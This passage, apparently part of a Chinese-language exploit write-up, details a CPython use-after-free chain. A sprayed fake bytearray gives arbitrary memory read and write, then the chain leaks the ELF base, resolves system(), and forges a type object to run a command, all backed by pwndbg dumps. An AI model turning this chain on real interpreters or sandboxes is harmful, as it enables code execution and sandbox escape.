    p64(id(bytearray)) +                     # +0x08 ob_type  = 真 bytearray 类型
    p64(2**63 - 1) +                         # +0x10 ob_size  = MAX(所有下标合法)
    p64(2**63 - 1) +                         # +0x18 ob_alloc = MAX
    p64(0) * 3                               # +0x20 ob_bytes=NULL, +0x28 ob_start=NULL, +0x30 ob_exports=0
)

堆喷将此模板写入被释放的 chunk,之后 Python 内部再将这块内存作为 bytearray 对象分配出去,该对象即为 mem(exploit 中 default_handler 捕获的对象)。

我在 pwndbg 中用 ctypes 模拟此喷写过程,在 BP1(喷写前)和 BP2(喷写后)分别暂停,直接查看 PyByteArrayObject 的内存:

[Stage 1]  PyByteArrayObject @ 0x7ffff74e3fb0
================================================================
  BEFORE corruption:
  +0x00  ob_refcnt  = 0x0000000000000001  (1)
  +0x08  ob_type    = 0x0000000000a8cd80
  +0x10  ob_size    = 0x0000000000000100  (256  = logical len)
  +0x18  ob_alloc   = 0x0000000000000101  (257  = capacity)
  +0x20  ob_bytes   = 0x00007ffff760b880  (backing buffer ptr)
  +0x28  ob_start   = 0x00007ffff760b880  (data start ptr)
  +0x30  ob_exports = 0x0000000000000000

  AFTER  corruption (fake_ba sprayed into freed slot):
  +0x00  ob_refcnt  = 0x0000000000123456  (fake, no GC)
  +0x10  ob_size    = 0x7fffffffffffffff  (= 2^63-1, all bounds pass)
  +0x18  ob_alloc   = 0x7fffffffffffffff  (= 2^63-1)
  +0x28  ob_start   = 0x0000000000000000  (NULL → buf[addr] = *(0+addr) = *addr)
  len(buf) = 9223372036854775807  ← Python sees a 9223372036854775807-byte window

ob_size = 0x7fffffffffffffff:Python 的 len(buf) 返回 2^63-1,任何小于该值的非负整数下标都能通过 i >= Py_SIZE(self) 检查。ob_start = NULL:bytearray_subscript 计算 ob_start + i = 0 + addr = addr,下标直接被当作虚拟地址访问。

pwndbg 在 BP2(堆喷完成,停在 os.kill 系统调用返回点):

─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
 RAX  0
 RBX  5
 RCX  0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
 RDI  0x11c82
 RSI  5
 R15  0x6a8bcf (os_kill) ◂— endbr64
 RIP  0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
──────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────
 ► 0x7ffff7c4553b <kill+11>            cmp    rax, -0xfff
   0x7ffff7c45543 <kill+19>            ret
    ↓
   0x6a8ba2       <os_kill_impl+52>    cmp    eax, -1
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
 ► 0   0x7ffff7c4553b kill+11
   1         0x6a8ba2 os_kill_impl+52
   2         0x6a8c0f os_kill+64
   3         0x4ff074 cfunction_vectorcall_FASTCALL+103
   4         0x5aa892 _PyEval_EvalFrameDefault+56003

第二步:任意读写原语

窗口打开后,r64 / w64 的实现很直接:

# mem 即第一步中被破坏的 bytearray:每个下标都是一个绝对地址。
read = lambda addr, sz: bytes(mem[addr + i] for i in range(sz))
r32  = lambda addr: int.from_bytes(read(addr, 4), 'little')   # 第四步会用到
r64  = lambda addr: int.from_bytes(read(addr, 8), 'little')
w64  = lambda addr, val: [mem.__setitem__(addr + i, (val >> 8*i) & 0xff) for i in range(8)]

mem[addr] 调用 bytearray_subscript,在 C 层对(已为 NULL 的)数据指针加下标解引用:*(0 + addr) = *(addr)。写入路径 mem.__setitem__(addr, byte) 走 bytearray_ass_subscript,同样直接写入地址 addr。

自洽性检验(canary round-trip)

pwndbg 中的 canary 写入测试:

[Stage 2]  Arb R/W self-consistency
================================================================
  target: canary_holder @ 0x7ffff74e3ec0
  r64(0x7ffff74e3ec0)  BEFORE write = 0x0000000000000001
  ctypes direct          BEFORE write = 0x0000000000000001

  w64(0x7ffff74e3ec0, 0xdeadbeefcafebabe)
  r64(0x7ffff74e3ec0)  AFTER  write = 0xdeadbeefcafebabe
  ctypes direct          AFTER  write = 0xdeadbeefcafebabe
  [PASS] read-back == 0xdeadbeefcafebabe

两条路径(r64 通过 mem 窗口 vs ctypes 直接映射)读到相同的值,原语验证通过。


第三步:泄露 ELF 基地址

利用 tp_dealloc 指针

id(int) 返回静态数据段中 PyLong_Type 的地址。在 PyTypeObject 结构中,tp_dealloc(析构函数指针)位于 +0x30:

PyTypeObject offset layout:
  +0x00  ob_refcnt
  +0x08  ob_type
  +0x10  ob_size
  +0x18  tp_name         (char*)
  +0x20  tp_basicsize
  +0x28  tp_itemsize
  +0x30  tp_dealloc      ← 指向 python3 二进制内的函数
  +0x38  tp_vectorcall_offset
  ...
  +0x90  tp_getattro     ← 后续 hijack 目标

r64(id(int) + 0x30) 读出 PyLong_Type.tp_dealloc,这是 python3 ELF 内的函数指针。将其页对齐(>> 12 << 12),然后向低地址逐页扫描,直到找到 \x7fELF magic——这就是 ELF header。

leak = (r64(id(int) + 0x30) >> 12) << 12
while read(leak, 4) != b"\x7fELF":
    leak -= 0x1000
elf_base = leak

pwndbg:

[Stage 3]  ELF base leak
================================================================
  id(int)  =  PyLong_Type @ 0x9a0a20
  r64(PyLong_Type + 0x30)  =  0x4e1d11  (tp_dealloc)
  page-aligned             =  0x4e1000

  ELF header @ 0x400000
    magic     = b'\x7fELF'
    e_type    = 0x0002   (2=ET_EXEC, 3=ET_DYN)
    e_machine = 0x003e   (62=EM_X86_64)
    e_entry   = 0x422066
    e_phoff   = 0x40   (14 entries × 56 bytes)

第四步:从 .dynamic 解析 system()

ELF header 包含 program header table。遍历 PHDR,找到类型为 PT_DYNAMIC (2) 的条目,其 p_vaddr 指向 .dynamic 节。

.dynamic 包含一系列 {d_tag, d_val} 对(每个字段 8 字节,每条 16 字节),以 d_tag==0 (DT_NULL) 结束。我们需要找四个 tag:

tag               值      含义
DT_JMPREL (23)    d_val   rela.plt 起始地址(导入函数重定位表)
DT_PLTRELSZ (2)   d_val   rela.plt 总字节数
DT_SYMTAB (6)     d_val   .dynsym 地址(符号表)
DT_STRTAB (5)     d_val   .dynstr 地址(符号名字符串表)

每条 Elf64_Rela 占 24 字节:

+0  r_offset  (8)  → 对应的 GOT slot 地址
+8  r_info    (8)  → 高 32 位是符号表 index,低 32 位是重定位类型
+16 r_addend  (8)

通过 .dynsym[sym_idx].st_name 得到符号名在 .dynstr 中的偏移,再从 .dynstr 读取字符串。找到 "system" 后,读取 r_offset 处 GOT slot 中的值即可得到运行时 system() 地址(前提是该 slot 已完成解析)。

for i in range(dt_pltrelsz // 24):
    rela      = dt_jmprel + i * 24
    r_offset  = r64(rela)           # GOT slot address
    r_info    = r64(rela + 8)
    sym_idx   = r_info >> 32
    st_name   = r32(dt_symtab + sym_idx * 24)
    name      = read(dt_strtab + st_name, 32).split(b"\x00")[0]
    if name == b"system":
        system = r64(r_offset)      # dereference GOT → real system() address
        break

pwndbg:

[Stage 4]  Resolving system() via .dynamic
================================================================
  PT_DYNAMIC: phdr[6]  p_vaddr=0xa8add8  filesz=0x200
  .dynamic resolved @ 0xa8add8

  DT_JMPREL  (rela.plt)  = 0x41c8d8   (501 entries)
  DT_SYMTAB              = 0x403818
  DT_STRTAB              = 0x410f28

  Found 'system' in rela.plt[106]:
    r_offset  (GOT entry addr)  = 0xa8b350
    sym_idx                      = 106
    GOT[r_offset] (resolved addr)= 0x7ffff7c58750
    first 8 bytes of system()   = f30f1efa4885ff74

0xf30f1efa = endbr64,这是 libc system() 的开头指令(CET 环境)。0x7ffff7c58750 是真实 libc 地址而非 PLT stub,说明符号已完成 lazy-resolve。


第五步:伪造 PyTypeObject

tp_getattro 是什么

当 Python 执行 obj.attr 时,解释器的执行路径为:

LOAD_ATTR 字节码
  → _PyObject_GetMethod(obj, "attr")
    → PyObject_GetAttr(obj, name)
      → f = Py_TYPE(obj)->tp_getattro    ← 读 ob_type 里的函数指针
        → f(obj, name)                   ← 间接调用

tp_getattro 在 PyTypeObject 中的偏移为 +0x90(PyObject_VAR_HEAD 的 24 字节加上其前面各字段)。这是一个 getattrofunc 指针,原型为:

typedef PyObject *(*getattrofunc)(PyObject *obj, PyObject *name);

如果将此指针改为 system,解释器访问属性时会调用 system(obj, name)。C 调用约定中第一个参数存于 RDI,而 system(const char *command) 只读取 RDI,实际效果即 system(obj)——执行 obj 地址处的字符串。

构造 fake_type

fake_type = flat(
    0x1000,                              # +0x00  ob_refcnt(高值防 GC)
    id(type(int)),                       # +0x08  ob_type(metaclass,保持合法性)
    b"\x00" * 0x28,                      # +0x10 ~ +0x37  padding(覆盖 ob_size / tp_name /
                                         #                 tp_basicsize / tp_itemsize / tp_dealloc)
    system,                              # +0x38  第一个填 system() 的 slot
) + p64(system) * 52                     # 再填 52 个 slot:+0x40 到 +0x1D8(缓冲区结束于 +0x1E0)
                                         # 覆盖 tp_getattro(+0x90) 和范围内其他所有 slot

将这段 bytes 放入一个 bytes 对象保持活跃,然后 fake_type_addr = id(bytes(fake_type)) + 32(跳过 PyBytesObject header 的 32 字节,指向内容区)。

pwndbg 内存验证

[Stage 5]  Fake PyTypeObject
================================================================
  fake_type_bytes (PyBytesObject) @ 0xd8be40
  content area (our fake type)    @ 0xd8be60
  int metaclass                   @ 0xaa6b60

  Slot inspection (first 20 qwords from fake_type_addr):
    +0x00:  0x0000000000001000  ← ob_refcnt
    +0x08:  0x0000000000aa6b60  ← ob_type (metaclass)
    +0x10:  0x0000000000000000
    +0x18:  0x0000000000000000
    +0x20:  0x0000000000000000
    +0x28:  0x0000000000000000
    +0x30:  0x0000000000000000
    +0x38:  0x00007ffff7c58750  ← tp_vectorcall_offset (also system)
    +0x40:  0x00007ffff7c58750  ← system() [+0x40]
    +0x90:  0x00007ffff7c58750  ← tp_getattro  *** system() ***

pwndbg 的 x/20gx fake_type_addr 确认:

(gdb) x/20gx 0xd8be60
0xd8be60:  0x0000000000001000  0x0000000000aa6b60
0xd8be70:  0x0000000000000000  0x0000000000000000
0xd8be80:  0x0000000000000000  0x0000000000000000
0xd8be90:  0x0000000000000000  0x00007ffff7c58750
0xd8bea0:  0x00007ffff7c58750  0x00007ffff7c58750
0xd8bef0:  0x00007ffff7c58750  0x00007ffff7c58750

0xd8bef0 = 0xd8be60 + 0x90——tp_getattro slot——确实为 0x7ffff7c58750 = system()


第六步:INCREF trick + fake_obj + RCE

问题:system() 的参数从哪里来

tp_getattro(obj, name) 调用时,obj 位于 RDI。system(const char *command) 接收 RDI 作为命令字符串指针。因此 system() 会执行 obj 地址处的字符串。

我们需要 obj(fake_obj_addr)指向一个伪造的 Python 对象,且该对象在 C 层的开头,即 ob_refcnt 字段的 8 字节,必须为 "id\x00..."(或其他短命令)。

INCREF trick 的精妙之处

直接存储 "id\x00..." 作为 ob_refcnt 会遇到问题:Python 的 BINARY_SUBSCR(list 下标访问)在返回元素前会执行 Py_INCREF(item),将 ob_refcnt 加 1。

利用此行为:将命令首字节减 1 后存入。'i' 的 ASCII 码为 105,减 1 得 104 = 'h'。INCREF 后 'h' → 'i',命令即正确。

cmd = bytes([ord('i') - 1]) + b"d\x00\x00\x00\x00\x00\x00"   # b"hd\x00..."
 
fake_obj = cmd + p64(fake_type_addr) + b"\x00" * 0x100
#  [0..7]   ob_refcnt = b"hd\x00..."  ← Py_INCREF 后变为 b"id\x00..."
#  [8..15]  ob_type   = fake_type_addr
#  [16..]   padding

ob_item 指针覆写

list 对象的内部结构:

PyListObject:
  +0x00  ob_refcnt
  +0x08  ob_type
  +0x10  ob_size          (len(list))
  +0x18  ob_item          (PyObject **,指向 payload 数组)
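  +0x20  allocated

r64(id(payload) + 0x18) 读出 ob_item(即存放 payload[0] 的 slot 地址),再用 w64(ob_item_addr, fake_obj_addr) 把 payload[0] 重定向到我们的 fake_obj:

payload = [None]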
w64(r64(id(payload) + 0x18), fake_obj_addr)   # 覆写 ob_item[0]

pwndbg 在 break PyObject_GetAttr 处停下(payload[0].pwned 触发的调用):

─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
*RDI  0x7ffff74acae0 ◂— 0x6469 /* 'id' */     ← fake_obj,INCREF 后已为 'id'
*RSI  0x7ffff7505990 ◂— 0xffffffff             ← PyUnicode "pwned"
 RIP  0x504607 (PyObject_GetAttr) ◂— endbr64

执行结果:

uid=1000(ivan) gid=1000(ivan) groups=1000(ivan),27(sudo)

收尾:完整 exploit 流程回顾

从 UAF 触发到命令执行,没有 shellcode、没有 ROP,全程利用解释器自己的 C 函数指针调度:

  1. fake_ba 堆喷把一个 bytearray 的缓冲区指针改成 NULL,ob_size 改成 MAX → 覆盖整个虚拟地址空间的窗口打开
  2. r64/w64 通过 bytearray 下标访问实现任意地址读写
  3. ELF base 由 PyLong_Type.tp_dealloc 指针反推
  4. system() 通过 ELF 的 PT_DYNAMIC → rela.plt 在运行时解析
  5. fake PyTypeObject 把 tp_getattro 填成 system()
  6. ob_item 覆写让 payload[0] 指向一个伪造的 Python 对象,该对象的 ob_refcnt 处存着命令字符串
  7. INCREF trick 利用 Python 的 BINARY_SUBSCR 自动 INCREF,把命令第一字节从 'h'(0x68) 变成 'i'(0x69)
  8. payload[0].pwned 触发 PyObject_GetAttr → tp_getattro(obj) → system("id")

(完)